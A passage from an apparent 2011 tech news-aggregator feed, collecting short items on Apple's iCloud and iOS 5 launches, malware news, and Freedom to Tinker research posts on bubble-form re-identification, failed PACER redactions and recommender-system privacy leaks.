    Increasing the universe of choice always improves the final results. Therefore, I see only advantages and I don’t see how we can be against internationalization. However, as I mentioned, I believe that an unilateral process will be limited to change higher education in Brazil (and also its impact on innovation and technology). Openning universities might not reduce the places for Brazilians, provided it is an organized and planned movement, correlated to our development level. If it is unilateral, then there can be indeed a loss for Brazilian students and professors.

    e) Finally, do you see a relation between innovation and the internationalization of universities?

    Yes, I do think the relation is positive between the two variables, but I don’t think it is possible to take any of them as isolated variables.

    Channel Image09:36 iCloud uses Windows Azure and Amazon S3» Bink.nu

    While still in beta Rafael Rivera (Within Windows blogger) worked with Paul Paliath at Infinite Apple to analyze iCloud traffic:

    Last week, we posted some screenshots showing what appeared to be Apple’s new iCloud-backed iMessage using Azure (and Amazon) services for hosting. Since then, GigaOM ran the screenshots through three “cloud and networking experts at major companies” and the trio dismissed our claims.

    Looking at the screenshots, it’s obvious Charles was used to dump iCloud traffic. Working with Within Windows blogger Rafael Rivera, we were able to set up a similar configuration with proper SSL sniffing capabilities — a set up that cloud and networking experts could have set up in minutes.

    We sent an image from and to iPhones running a beta copy of iOS 5. The resulting traffic showed, quite clearly, the use of Azure services for hosting purposes. We don’t believe iCloud stores actual content. Rather, it simply manages links to uploaded content.

    Full story and opinion at Paul Thurrott’s blog:

    Confirmed Apple iCloud Does Not Stand Alone - SuperSite Blog


    Tue 14 June, 2011

    Channel Image21:06 Malware abusing Windows Autorun plummets» The Register - Security: Malware

    You'll never guess why

    Microsoft saw a sharp drop in malware infections that exploit a widely abused Windows Autorun feature almost immediately after it was automatically disabled in earlier versions of the operating system.…

    Channel Image20:10 Deceptive Assurances of Privacy?» Freedom to Tinker

    Earlier this week, Facebook expanded the roll-out of its facial recognition software to tag people in photos uploaded to the social networking site. Many observers and regulators responded with privacy concerns; EFF offered a video showing users how to opt-out.

    Tim O'Reilly, however, takes a different tack:

    Face recognition is here to stay. My question is whether to pretend that it doesn't exist, and leave its use to government agencies, repressive regimes, marketing data mining firms, insurance companies, and other monolithic entities, or whether to come to grips with it as a society by making it commonplace and useful, figuring out the downsides, and regulating those downsides.

    ...We need to move away from a Maginot-line like approach where we try to put up walls to keep information from leaking out, and instead assume that most things that used to be private are now knowable via various forms of data mining. Once we do that, we start to engage in a question of what uses are permitted, and what uses are not.

    O'Reilly's point --and face-recognition technology -- is bigger than Facebook. Even if Facebook swore off the technology tomorrow, it would be out there, and likely used against us unless regulated. Yet we can't decide on the proper scope of regulation without understanding the technology and its social implications.

    By taking these latent capabilities (Riya was demonstrating them years ago; the NSA probably had them decades earlier) and making them visible, Facebook gives us more feedback on the privacy consequences of the tech. If part of that feedback is "ick, creepy" or worse, we should feed that into regulation for the technology's use everywhere, not just in Facebook's interface. Merely hiding the feature in the interface, while leaving it active in the background would be deceptive: it would give us a false assurance of privacy. For all its blundering, Facebook seems to be blundering in the right direction now.

    Compare the furor around Dropbox's disclosure "clarification". Dropbox had claimed that "All files stored on Dropbox servers are encrypted (AES-256) and are inaccessible without your account password," but recently updated that to the weaker assertion: "Like most online services, we have a small number of employees who must be able to access user data for the reasons stated in our privacy policy (e.g., when legally required to do so)." Dropbox had signaled "encrypted": absolutely private, when it meant only relatively private. Users who acted on the assurance of complete secrecy were deceived; now those who know the true level of relative secrecy can update their assumptions and adapt behavior more appropriately.

    Privacy-invasive technology and the limits of privacy-protection should be visible. Visibility feeds more and better-controlled experiments to help us understand the scope of privacy, publicity, and the space in between (which Woody Hartzog and Fred Stutzman call "obscurity" in a very helpful draft). Then, we should implement privacy rules uniformly to reinforce our social choices.

    Mon 13 June, 2011

    Channel Image07:02 Toxic Plankton feeds on Android Market for two months» The Register - Security: Malware

    Google never said it wouldn't

    The security of Google Android has once again been called into question after an academic researcher discovered 12 malicious apps hosted in the operating system's official applications market, some that had been hosted there for months and racked up hundreds of thousands of downloads.…

    Fri 10 June, 2011

    Channel Image15:16 Sophos says sorry over Google Analytics false alarm» The Register - Security: Malware

    No harm done

    Updated Sophos has apologised after its security screening technology went awry and began falsely warning users when they visited websites running Google Analytics.…

    Channel Image00:27 Peeping Tom Mac spyware suspect cuffed» The Register - Security: Malware

    Sleazy does it

    A PC repair technician has been charged with planting spyware on the machines of clients as part of a ruse designed to capture pictures of them in various states of undress.…

    Free Whitepaper: Implementing Energy Efficient Data Centers

    Thu 09 June, 2011

    Channel Image23:46 Next Tuesday 16 bulletins addressing 34 vulnerabilities!» Bink.nu

    Advance Notification Service information on 16 bulletins (nine Critical in severity, seven Important) addressing 34 vulnerabilities in Microsoft Windows, Microsoft Office, Internet Explorer, .NET, SQL, Visual Studios, Silverlight and ISA. All bulletins will be released on Tuesday, June 14, at approximately 10am PDT. Come back to this blog on Tuesday for our official risk and impact analysis, along with deployment guidance and a video overview of the release.

    One of the issues we start to address in this release is “cookiejacking,” which allows an attacker to steal cookies from a user’s computer and access websites the user has logged into. The Internet Explorer bulletin will address one of the known vectors to the cookie folder. Given the prevalence of other types of social engineering methods in use by criminals, which provide access to much more than cookies, we believe this issue poses lower risk to customers. Further, based on a signature that has been released to millions of Microsoft Security Essentials and Forefront customers, the Microsoft Malware Protection Center (MMPC) has not detected attempts to use this technique.

     

    June Advance Notification Service


    Wed 08 June, 2011

    Channel Image06:27 New Research Result: Bubble Forms Not So Anonymous» Freedom to Tinker

    Today, Joe Calandrino, Ed Felten and I are releasing a new result regarding the anonymity of fill-in-the-bubble forms. These forms, popular for their use with standardized tests, require respondents to select answer choices by filling in a corresponding bubble. Contradicting a widespread implicit assumption, we show that individuals create distinctive marks on these forms, allowing use of the marks as a biometric. Using a sample of 92 surveys, we show that an individual's markings enable unique re-identification within the sample set more than half of the time. The potential impact of this work is as diverse as use of the forms themselves, ranging from cheating detection on standardized tests to identifying the individuals behind “anonymous” surveys or election ballots.

    If you've taken a standardized test or voted in a recent election, you’ve likely used a bubble form. Filling in a bubble doesn't provide much room for inadvertent variation. As a result, the marks on these forms superficially appear to be largely identical, and minor differences may look random and not replicable. Nevertheless, our work suggests that individuals may complete bubbles in a sufficiently distinctive and consistent manner to allow re-identification. Consider the following bubbles from two different individuals:

    These individuals have visibly different stroke directions, suggesting a means of distinguishing between both individuals. While variation between bubbles may be limited, stroke direction and other subtle features permit differentiation between respondents. If we can learn an individual's characteristic features, we may use those features to identify that individual's forms in the future.

    To test the limits of our analysis approach, we obtained a set of 92 surveys and extracted 20 bubbles from each of those surveys. We set aside 8 bubbles per survey to test our identification accuracy and trained our model on the remaining 12 bubbles per survey. Using image processing techniques, we identified the unique characteristics of each training bubble and trained a classifier to distinguish between the surveys’ respondents. We applied this classifier to the remaining test bubbles from a respondent. The classifier orders the candidate respondents based on the perceived likelihood that they created the test markings. We repeated this test for each of the 92 respondents, recording where the correct respondent fell in the classifier’s ordered list of candidate respondents.

    If bubble marking patterns were completely random, a classifier could do no better than randomly guessing a test set’s creator, with an expected accuracy of 1/92 ≈ 1%. Our classifier achieves over 51% accuracy. The classifier is rarely far off: the correct answer falls in the classifier’s top three guesses 75% of the time (vs. 3% for random guessing) and its top ten guesses more than 92% of the time (vs. 11% for random guessing). We conducted a number of additional experiments exploring the information available from marked bubbles and potential uses of that information. See our paper for details.

    Additional testing---particularly using forms completed at different times---is necessary to assess the real-world impact of this work. Nevertheless, the strength of these preliminary results suggests both positive and negative implications depending on the application. For standardized tests, the potential impact is largely positive. Imagine that a student takes a standardized test, performs poorly, and pays someone to repeat the test on his behalf. Comparing the bubble marks on both answer sheets could provide evidence of such cheating. A similar approach could detect third-party modification of certain answers on a single test.

    The possible impact on elections using optical scan ballots is more mixed. One positive use is to detect ballot box stuffing---our methods could help identify whether someone replaced a subset of the legitimate ballots with a set of fraudulent ballots completed by herself. On the other hand, our approach could help an adversary with access to the physical ballots or scans of them to undermine ballot secrecy. Suppose an unscrupulous employer uses a bubble form employment application. That employer could test the markings against ballots from an employee’s jurisdiction to locate the employee’s ballot. This threat is more realistic in jurisdictions that release scans of ballots.

    Appropriate mitigation of this issue is somewhat application specific. One option is to treat surveys and ballots as if they contain identifying information and avoid releasing them more widely than necessary. Alternatively, modifying the forms to mask marked bubbles can remove identifying information but, among other risks, may remove evidence of respondent intent. Any application demanding anonymity requires careful consideration of options for preventing creation or disclosure of identifying information. Election officials in particular should carefully examine trade-offs and mitigation techniques if releasing ballot scans.

    This work provides another example in which implicit assumptions resulted in a failure to recognize a link between the output of a system (in this case, bubble forms or their scans) and potentially sensitive input (the choices made by individuals completing the forms). Joe discussed a similar link between recommendations and underlying user transactions two weeks ago. As technologies advance or new functionality is added to systems, we must explicitly re-evaluate these connections. The release of scanned forms combined with advances in image analysis raises the possibility that individuals may inadvertently tie themselves to their choices merely by how they complete bubbles. Identifying such connections is a critical first step in exploiting their positive uses and mitigating negative ones.

    This work will be presented at the 2011 USENIX Security Symposium in August.

    Tue 07 June, 2011

    Channel Image02:17 Apple Introduces iCloud» Apple Hot News
    Apple today introduced iCloud, a set of free new cloud services that work seamlessly with applications on your iPad, iPhone, iPod touch, Mac, or PC to automatically and wirelessly store your content and push it to all your devices. iCloud services include new versions of Contact, Calendar, and Mail; iCloud Backup and Storage; Photo Stream; and iTunes in the Cloud. And for just $24.99 a year, iTunes Match will give you all of the benefits of iTunes in the Cloud for music you haven’t purchased from iTunes. iCloud will be available this fall, along with iOS 5. A free beta version of iTunes in the Cloud is available today in the U.S. and requires iTunes 10.3 and iOS 4.3.3.
    Channel Image02:10 Apple Previews iOS 5» Apple Hot News
    Apple today previewed iOS 5, the latest version of the world’s most advanced mobile operating system, with over 200 new features that will be available as a free software update to iPad, iPhone, and iPod touch users this fall. New iOS 5 features include: Notification Center, an innovative way to easily view and manage notifications in one place without interruption; iMessage, a new messaging service that lets you send text messages, photos, and videos between all iOS 5 devices; and Newsstand, a new way to purchase and organize your newspaper and magazine subscriptions. And with iOS 5, iPad, iPhone, and iPod touch users can activate and set up new iOS devices right out of the box and get software updates over the air — no computer required.
    Channel Image02:07 Mac OS X Lion Available in July from Mac App Store» Apple Hot News
    Apple today announced that Mac OS X Lion — the eighth major release of the world’s most advanced desktop operating system — will be available to customers in July as a download from the Mac App Store for $29.99. OS X Lion offers more than 250 new features, including Multi-Touch gestures; systemwide support for full-screen apps; Mission Control, a bird’s-eye view of everything running on your Mac; Launchpad, a new home for all your apps; and a completely redesigned Mail app.

    Thu 02 June, 2011

    Channel Image23:23 Rustock botnet suspect fancies job at Google» The Register - Security: Malware

    Circumstantial evidence points to aspirational cv

    A Rustock botnet suspect has aspirations to work at Google, according to a nice piece of cyber-sleuthing by ex-Washington Post reporter Brian Krebs.…

    Channel Image19:20 Tinkering with the IEEE and ACM copyright policies» Freedom to Tinker

    It’s historically been the case that papers published in an IEEE or ACM conference or journal must have their copyrights assigned to the IEEE or ACM, respectively. Most of us were happy with this sort of arrangement, but the new IEEE policy seems to apply more restrictions on this process. Matt Blaze blogged about this issue in particular detail.

    The IEEE policy and the comparable ACM policy appear to be focused on creating revenue opportunities for these professional societies. Hypothetically, that income should result in cost savings elsewhere (e.g., lower conference registration fees) or in higher quality member services (e.g., paying the expenses of conference program committee members to attend meetings). In practice, neither of these are true. Regardless, our professional societies work hard to keep a paywall between our papers and their readership. Is this sort of behavior in our best interests? Not really.

    What benefits the author of an academic paper? In a word, impact. Papers that are more widely read are more widely influential. Furthermore, widely read papers are more widely cited; citation counts are explicitly considered in hiring, promotion, and tenure cases. Anything that gets in the way of a paper’s impact is something that damages our careers and it’s something we need to fix.

    There are three common solutions. First, we ignore the rules and post copies of our work on our personal, laboratory, and/or departmental web pages. Virtually any paper written in the past ten years can be found online, without cost, and conveniently cataloged by sites like Google Scholar. Second, some authors I’ve spoken to will significantly edit the copyright assignment forms before submitting them. Nobody apparently ever notices this. Third, some professional societies, notably the USENIX Association, have changed their rules. The USENIX policy completely inverts the relationship between author and publisher. Authors grant USENIX certain limited and reasonable rights, while the authors retain copyright over their work. USENIX then posts all the papers on its web site, free of charge; authors are free to do the same on their own web sites.

    (USENIX ensures that every conference proceedings has a proper ISBN number. Every USENIX paper is just as “published” as a paper in any other conference, even though printed proceedings are long gone.)

    Somehow, the sky hasn’t fallen. So far as I know, the USENIX Association’s finances still work just fine. Perhaps it’s marginally more expensive to attend a USENIX conference, but then the service level is also much higher. The USENIX professional staff do things that are normally handled by volunteer labor at other conferences.

    This brings me to the vote we had last week at the IEEE Symposium on Security and Privacy (the “Oakland” conference) during the business meeting. We had an unusually high attendance (perhaps 150 out of 400 attendees) as there were a variety of important topics under discussion. We spent maybe 15 minutes talking about the IEEE’s copyright policy and the resolution before the room was should we reject the IEEE copyright policy and adopt the USENIX policy? Ultimately, there were two “no” votes and everybody else voted “yes.” That’s an overwhelming statement.

    The question is what happens next. I’m planning to attend ACM CCS this October in Chicago and I expect we can have a similar vote there. I hope similar votes can happen at other IEEE and ACM conferences. Get it on the agenda of your business meetings. Vote early and vote often! I certainly hope the IEEE and ACM agree to follow the will of their membership. If the leadership don’t follow the membership, then we’ve got some more interesting problems that we’ll need to solve.

    Sidebar: ACM and IEEE make money by reselling our work, particularly with institutional subscriptions to university libraries and large companies. As an ACM or IEEE member, you also get access to some, but not all, of the online library contents. If you make everything free (as in free beer), removing that revenue source, then you’ve got a budget hole to fill. While I’m no budget wizard, it would make sense for our conference registration fees to support the archival online storage of our papers. Add in some online advertising (example: startup companies, hungry to hire engineers with specialized talents, would pay serious fees for advertisements adjacent to research papers in the relevant areas), and I’ll bet everything would work out just fine.

    Tue 31 May, 2011

    Channel Image23:58 iWork Now Available For iPhone and iPod touch Users» Apple Hot News
    Apple today announced that its groundbreaking iWork productivity apps — Keynote, Pages, and Numbers — are now available for iPhone and iPod touch, as well as iPad. Created for the Mac and then completely redesigned for iOS and the Multi-Touch interface, Keynote, Pages, and Numbers allow you to create and share stunning presentations, beautifully formatted documents, and powerful spreadsheets on the go. iWork apps are available on the App Store for $9.99 each to new users and as a free update for existing iWork for iPad customers.

    Sat 28 May, 2011

    Channel Image14:09 OpenFormula Success!» David A. Wheeler's Blog

    After years of work, the world is making a step forward to letting authors own and control their own documents, instead of having them controlled by office document software vendors.

    Historically, every office document suite has stored data in its own incompatible format, locking users into that suite and inhibiting competition. This lack of a free and open office document format also makes a lie out of archiving; storing the bits is irrelevant because formats change over time in undocumented ways, with the result that later programs often cannot read older files (we can still read the Magna Carta, but some powerpoint files I created only 15 years ago cannot be read by current versions of Microsoft Office). Governments in particular should not have their documents beholden to any supplier; important government documents should be available to future generations.

    Thankfully, the OASIS Open Document Format for Office Applications (OpenDocument) Technical Committee (TC) is wrapping up its update of the OpenDocument standard, and I think they are about to complete the new version 1.2. This standard lets people store and exchange editable office documents so they edited by programs made by different suppliers. This will enable real competition, and enable future generations to read the materials we develop today. The TC has already approved OpenDocument v1.2 as a Committee Specification, and at this point I think the odds are excellent that it will get through the rest of the process and become formally approved.

    One of the big improvements, from my point of view, is that the TC has successfully defined how to store and exchange recalculated formulas in office documents. That was my goal for joining the TC years ago, and I’m delighted to have played a part in this update. Since it looks like it’s on its way to success, I plan to step down as chair of the OASIS Office formula subcommittee and to leave the TC. I am very grateful to everyone who helped — thank you. For those who aren’t familiar with the story of the formula subcommittee, please let me give a brief background.

    Years ago I was delighted to see a standard way to store office documents and exchange them between different suppliers’ products: OASIS Open Document Format for Office Applications (OpenDocument). People around the world create office documents, so this is a standard the world really needed!! However, I was deeply troubled when I discovered that this specification did not include a standard way to exchange recalculated formulas, such as those used in spreadsheets. I thought this was an important weakness in the specification. So I talked to others to see what could be done, and started work that might fill this void, including recruiting people to help.

    I am delighted to report that we now have a specification for formulas: OpenFormula, part 2 of the current draft of the OpenDocument standard. Now the world has a standard, developed by multiple suppliers, that lets people store office documents for future generations and exchange office documents between different suppliers’ products, that includes recalculated formulas. And it’s not just a spec; people are already implementing it (which is good; only implemented specs have value). There are still some procedural steps, but I have high hopes that at this point we are essentially done.

    This work was not done by just me, of course, or even primarily by me. A vast number of people worked directly and behind the scenes to make it happen. I cannot possibly list them all. I can, however, express my great gratitude to them. Thank you, thank you, thank you. You — and there are many of you — have made this a success. Again, thank you so very much.

    The reason I joined the OASIS technical committee (TC) was to help create this formula specification and turn it into a reality. Making a real standard, one agreed on by multiple parties, takes a lot of work. We developers of the formula specification discussed details such as what 0 to the 0 power should mean, date basis systems, unit systems, and many other details like that, because addressing detailed issues is necessary to create a good standard. We had to nail down evaluation order and determine that a light-year is the distance light travels in exactly 365.25 days. And so on. We got a lot of participation by various spreadsheet suppliers; implementers even changed their implementations to conform with the draft spec as it was being developed! This work took time, but the point was to create a specification people would actually use, not just put on a shelf, and that made the extra time worth it. If you are interested in learning more, feel free to listen to The ODF Podcast 004: David A. Wheeler on OpenFormula (an interview of me by Rob Weir).

    Now, finally, that work appears to be done. As I noted, there are a few procedural steps before the current specification becomes an official standard; change is always possible. Also, I’m sure there will be clarifications and additions over time, as with any standard in use. But at this point, I think my goal has been accomplished, and I am grateful.

    So, I think now is a good time for me to make a graceful exit from the TC. After all, my goal has been accomplished. So, I intend to step down as subcommittee chair of the formula subcommittee and to leave the TC. Technically there are still some procedural steps and there’s a potential for issues; if there’s a need for me help to wrap up something, I’ll do so. But I think things are concluding, so it’s a good time to say so.

    I think the effort to specify spreadsheet formulas has been a great success. We got a lot accomplished. Most importantly, we got something important accomplished for the world. Thank you, everyone who helped.

    Thu 26 May, 2011

    Channel Image23:16 Moving from Typepad to WordPress» scriptygoddess
    I recently had a client who wanted to move from TypePad to WordPress. An interesting procedure, let me tell you. The most critical help came from this post on foliovision.com. Of particular note, was the way they pulled down all the images from the Typepad site – using HTTrack. My original plan was to use [...] Related posts:
    1. The mysteriously disappearing WordPress 3.1 Admin Bar I've run into this problem a few times now and...
    Related posts brought to you by Yet Another Related Posts Plugin.

    Wed 25 May, 2011

    Channel Image23:52 Studying the Frequency of Redaction Failures in PACER» Freedom to Tinker

    Since we launched RECAP a couple of years ago, one of our top concerns has been privacy. The federal judiciary's PACER system offers the public online access to hundreds of millions of court records. The judiciary's rules require each party in a case to redact certain types of information from documents they submit, but unfortunately litigants and their counsel don't always comply with these rules. Three years ago, Carl Malamud did a groundbreaking audit of PACER documents and found more than 1600 cases in which litigants submitted documents with unredacted Social Security numbers. My recent research has focused on a different problem: cases where parties tried to redact sensitive information but the redactions failed for technical reasons. This problem occasionally pops up in news stories, but as far as I know, no one has conducted a systematic study.

    To understand the problem, it helps to know a little bit about how computers represent graphics. The simplest image formats are bitmap or raster formats. These represent an image as an array of pixels, with each pixel having a color represented by a numeric value. The PDF format uses a different approach, known as vector graphics, that represent an image as a series of drawing commands: lines, rectangles, lines of text, and so forth.

    Vector graphics have important advantages. Vector-based formats "scale up" gracefully, in contrast to the raster images that look "blocky" at high resolutions. Vector graphics also do a better job of preserving a document's structure. For example, text in a PDF is represented by a sequence of explicit text-drawing commands, which is why you can cut and paste text from a PDF document, but not from a raster format like PNG.

    But vector-based formats also have an important disadvantage: they may contain more information than is visible to the naked eye. Raster images have a "what you see is what you get" quality—changing all the pixels in a particular region to black destroys the information that was previously in that part of the image. But a vector-based image can have multiple "layers." There might be a command to draw some text followed by a command to draw a black rectangle over the text. The image might look like it's been redacted, but the text is still "under" the box. And often extracting that information is a simple matter of cutting and pasting.

    So how many PACER documents have this problem? We're in a good position to study this question because we have a large collection of PACER documents—1.8 million of them when I started my research last year. I wrote software to detect redaction rectangles—it turns out these are relatively easy to recognize based on their color, shape, and the specific commands used to draw them. Out of 1.8 million PACER documents, there were approximately 2000 documents with redaction rectangles. (There were also about 3500 documents that were redacted by replacing text by strings of Xes, I also excluded documents that were redacted by Carl Malamud before he donated them to our archive.)

    Next, my software checked to see if these redaction rectangles overlapped with text. My software identified a few hundred documents that appeared to have text under redaction rectangles, and examining them by hand revealed 194 documents with failed redactions. The majority of the documents (about 130) appear be from commercial litigation, in which parties have unsuccessfully attempted to redact trade secrets such as sales figures and confidential product information. Other improperly redacted documents contain sensitive medical information, addresses, and dates of birth. Still others contain the names of witnesses, jurors, plaintiffs, and one minor.

    Implications

    PACER reportedly contains about 500 million documents. We don't have a random sample of PACER documents, so we should be careful about trying to extrapolate to the entire PACER corpus. Still, it's safe to say there are thousands, and probably tens of thousands, of documents in PACER whose authors made unsuccessful attempts to conceal information.

    It's also important to note that my software may not be detecting every instance of redaction failures. If a PDF was created by scanning in a paper document (as opposed to generated directly from a word processor), then it probably won't have a "text layer." My software doesn't detect redaction failures in this type of document. This means that there may be more than 194 failed redactions among the 1.8 million documents I studied.

    A few weeks ago I wrote a letter to Judge Lee Rosenthal, chair of the federal judiciary's Committee on Rules of Practice and Procedure, explaining this problem. In that letter I recommend that the courts themselves use software like mine to automatically scan PACER documents for this type of problem. In addition to scanning the documents they already have, the courts should make it a standard part of the process for filing new documents with the courts. This would allow the courts to catch these problems before the documents are made available to the public on the PACER website.

    My code is available here. It's experimental research code, not a finished product. We're releasing it into the public domain using the CC0 license; this should make it easy for federal and state officials to adapt it for their own use. Court administrators who are interested in adapting the code for their own use are especially encouraged to contact me for advice and assistance. The code relies heavily on the CAM::PDF Perl library, and I'm indebted to Chris Dolan for his patient answers to my many dumb questions.

    Getting Redaction Right

    So what should litigants do to avoid this problem? The National Security Agency has a good primer on secure redaction. The approach they recommend—completely deleting sensitive information in the original word processing document, replacing it with innocuous filler (such as strings of XXes) as needed, and then converting it to a PDF document, is the safest approach. The NSA primer also explains how to check for other potentially sensitive information that might be hidden in a document's metadata.

    Of course, there may be cases where this approach isn't feasible because a litigant doesn't have the original word processing document or doesn't want the document's layout to be changed by the redaction process. Adobe Acrobat's redaction tool has worked correctly when we've used it, and Adobe probably has the expertise to do it correctly. There may be other tools that work correctly, but we haven't had an opportunity to experiment with them so we can't say which ones they might be.

    Regardless of the tool used, it's a good idea to take the redacted document and double-check that the information was removed. An easy way to do this is to simply cut and paste the "redacted" content into another document. If the redaction succeeded, no text should be transferred. This method will catch most, but not all, redaction failures. A more rigorous check is to remove the redaction rectangles from the document and manually observe what's underneath them. One of the scripts I'm releasing today, called remove_rectangles.pl, does just that. In its current form, it's probably not user-friendly enough for non-programmers to use, but it would be relatively straightforward for someone (perhaps Adobe or the courts) to build a user-friendly version that ordinary users could use to verify that the document they just attempted to redact actually got redacted.

    One approach we don't endorse is printing the document out, redacting it with a black marker, and then re-scanning it to PDF format. Although this may succeed in removing the sensitive information, we don't recommend this approach because it effectively converts the document into a raster-based image, destroying useful information in the process. For example, it will no longer be possible to cut and paste (non-redacted) text from a document that has been redacted in this way.

    Bad redactions are not a new problem, but they are taking on a new urgency as PACER documents become increasingly available on the web. Correct redaction is not difficult, but it does require both knowledge and care by those who are submitting the documents. The courts have several important roles they should play: educating attorneys about their redaction responsibilities, providing them with software tools that make it easy for them to comply, and monitoring submitted documents to verify that the rules are being followed.

    This research was made possible with the financial support of Carl Malamud's organization, Public.Resource.Org.

    AttachmentSize
    rosenthal_redacted.pdf138.38 KB
    Channel Image08:23 evo 11 Conference» scriptygoddess
    I'm pleased to announce that I'll be speaking at evo conference in July. I will be running some workshops on WordPress and social media. (How strange it will be to head back to Utah!) I hope to see you there. If you're going, definitely say hello. No related posts. Related posts brought to you by [...] No related posts. Related posts brought to you by Yet Another Related Posts Plugin.

    Tue 24 May, 2011

    Channel Image23:07 "You Might Also Like:" Privacy Risks of Collaborative Filtering» Freedom to Tinker

    Ann Kilzer, Arvind Narayanan, Ed Felten, Vitaly Shmatikov, and I have released a new research paper detailing the privacy risks posed by collaborative filtering recommender systems. To examine the risk, we use public data available from Hunch, LibraryThing, Last.fm, and Amazon in addition to evaluating a synthetic system using data from the Netflix Prize dataset. The results demonstrate that temporal changes in recommendations can reveal purchases or other transactions of individual users.

    To help users find items of interest, sites routinely recommend items similar to a given item. For example, product pages on Amazon contain a "Customers Who Bought This Item Also Bought" list. These recommendations are typically public, and they are the product of patterns learned from all users of the system. If customers often purchase both item A and item B, a collaborative filtering system will judge them to be highly similar. Most sites generate ordered lists of similar items for any given item, but some also provide numeric similarity scores.

    Although item similarity is only indirectly related to individual transactions, we determined that temporal changes in item similarity lists or scores can reveal details of those transactions. If you're a Mozart fan and you listen to a Justin Bieber song, this choice increases the perceived similarity between Justin Bieber and Mozart. Because similarity lists and scores are based on perceived similarity, your action may result in changes to these scores or lists.

    Suppose that an attacker knows some of your past purchases on a site: for example, past item reviews, social networking profiles, or real-world interactions are a rich source of information. New purchases will affect the perceived similarity between the new items and your past purchases, possibility causing visible changes to the recommendations provided for your previously purchased items. We demonstrate that an attacker can leverage these observable changes to infer your purchases. Among other things, these attacks are complicated by the fact that multiple users simultaneously interact with a system and updates are not immediate following a transaction.

    To evaluate our attacks, we use data from Hunch, LibraryThing, Last.fm, and Amazon. Our goal is not to claim privacy flaws in these specific sites (in fact, we often use data voluntarily disclosed by their users to verify our inferences), but to demonstrate the general feasibility of inferring individual transactions from the outputs of collaborative filtering systems. Among their many differences, these sites vary dramatically in the information that they reveal. For example, Hunch reveals raw item-to-item correlation scores, but Amazon reveals only lists of similar items. In addition, we examine a simulated system created using the Netflix Prize dataset. Our paper outlines the experimental results.

    While inference of a Justin Bieber interest may be innocuous, inferences could expose anything from dissatisfaction with a job to health issues. Our attacks assume that a victim reveals certain past transactions, but users may publicly reveal certain transactions while preferring to keep others private. Ultimately, users are best equipped to determine which transactions would be embarrassing or otherwise problematic. We demonstrate that the public outputs of recommender systems can reveal transactions without user knowledge or consent.

    Unfortunately, existing privacy technologies appear inadequate here, failing to simultaneously guarantee acceptable recommendation quality and user privacy. Mitigation strategies are a rich area for future work, and we hope to work towards solutions with others in the community.

    Worth noting is that this work suggests a risk posed by any feature that adapts in response to potentially sensitive user actions. Unless sites explicitly consider the data exposed, such features may inadvertently leak details of these underlying actions.

    Our paper contains additional details. This work was presented earlier today at the 2011 IEEE Symposium on Security and Privacy. Arvind has also blogged about this work.

    Sat 21 May, 2011

    Channel Image00:26 iMac Top Choice Among All-in-Ones» Apple Hot News
    With its “souped-up” CPU and graphics performance, beautiful design, and best-in-class display, the 27-inch iMac earns a 9/10 rating and an Editors’ Choice award from Computer Shopper. Noting iMac’s strong productivity performance and excellent gaming capabilities, reviewer Jonathan Rougeout concludes: “In almost every way, this top-of-the-line model beats every other all-in-one on the market.”

    Tue 17 May, 2011

    Channel Image21:52 Web Tracking and User Privacy Workshop: Test Cases for Privacy on the Web» Freedom to Tinker

    This guest post is from Nick Doty, of the W3C and UC Berkeley School of Information. As a companion post to my summary of the position papers submitted for last month's W3C Do-Not-Track Workshop, hosted by CITP, Nick goes deeper into the substance and interaction during the workshop.

    The level of interest and participation in last month's Workshop on Web Tracking and User Privacy — about a hundred attendees spanning multiple countries, dozens of companies, a wide variety of backgrounds — confirms the broad interest in Do Not Track. The relatively straightforward technical approach with a catchy name has led to, in the US, proposed legislation at both the state and federal level and specific mention by the Federal Trade Commission (it was nice to have Ed Felten back from DC representing his new employer at the workshop), and comparatively rapid deployment of competing proposals by browser vendors. Still, one might be surprised that so many players are devoting such engineering resources to a relatively narrow goal: building technical means that allow users to avoid tracking across the Web for the purpose of compiling behavioral profiles for targeted advertising.

    In fact, Do Not Track (in all its variations and competing proposals) is the latest test case for how new online technologies will address privacy issues. What mix of minimization techniques (where one might classify Microsoft's Tracking Protection block lists) versus preference expression and use limitation (like a Do Not Track header) will best protect privacy and allow for innovation? Can parties agree on a machine-readable expression of privacy preferences (as has been heavily debated in P3P, GeoPriv and other standards work), and if so, how will terms be defined and compliance monitored and enforced? Many attendees were at the workshop not just to address this particular privacy problem — ubiquitous invisible tracking of Web requests to build behavioral profiles — but to grab a seat at the table where the future of how privacy is handled on the Web may be decided. The W3C, for its part, expects to start an Interest Group to monitor privacy on the Web and spin out specific work as new privacy issues inevitably arise, in addition to considering a Working Group to address this particular topic (more below). The Internet Engineering Task Force (IETF) is exploring a Privacy Directorate to provide guidance on privacy considerations across specs.

    At a higher level, this debate presents a test case for the process of building consensus and developing standards around technologies like tracking protection or Do Not Track that have inspired controversy. What body (or rather, combination of bodies) can legitimately define preference expressions that must operate at multiple levels in the Web stack, not to mention serve the diverse needs of individuals and entities across the globe? Can the same organization that defines the technical design also negotiate semantic agreement between very diverse groups on the meaning of "tracking"? Is this an appropriate role for technical standards bodies to assume? To what extent can technical groups work with policymakers to build solutions that can be enforced by self-regulatory or governmental players?

    Discussion at the recent workshop confirmed many of these complexities: though the agenda was organized to roughly separate user experience, technical granularity, enforcement and standardization, overlap was common and inevitable. Proposals for an "ack" or response header brought up questions of whether the opportunity to disclaim following the preference would prevent legal enforcement; whether not having such a response would leave users confused about when they had opted back in; and how granular such header responses should be. In defining first vs. third party tracking, user expectations, current Web business models and even the same-origin security policy could point the group in different directions.

    We did see some moments of consensus. There was general agreement that while user interface issues were key to privacy, trying to standardize those elements was probably counterproductive but providing guidance could help significantly. Regarding the scope of "tracking", the group was roughly evenly divided on what they would most prefer: a broad definition (any logging), a narrow definition (online behavioral advertising profiling only) or something in between (where tracking is more than OBA but excludes things like analytics or fraud protection, as in the proposal from the Center for Democracy and Technology). But in a "hum" to see which proposals workshop attendees opposed ("non-starters") no one objected to starting with a CDT-style middle ground — a rather shocking level of agreement to end two days chock full of debate.

    For tech policy nerds, then, this intimate workshop about a couple of narrow technical proposals was heady stuff. And the points of agreement suggest that real interoperable progress on tracking protection — the kind that will help the average end user's privacy — is on the way. For the W3C, this will certainly be a topic of discussion at the ongoing meeting in Bilbao, and we're beginning detailed conversations about the scope and milestones for a Working Group to undertake technical standards work.

    Thanks again to Princeton/CITP for hosting the event, and to Thomas and Lorrie for organizing it: bringing together this diverse group of people on short notice was a real challenge, and it paid off for all of us. If you'd like to see more primary materials: minutes from the workshop (including presentations and discussions) are available, as are the position papers and slides. And the W3C will post a workshop report with a more detailed summary very soon.

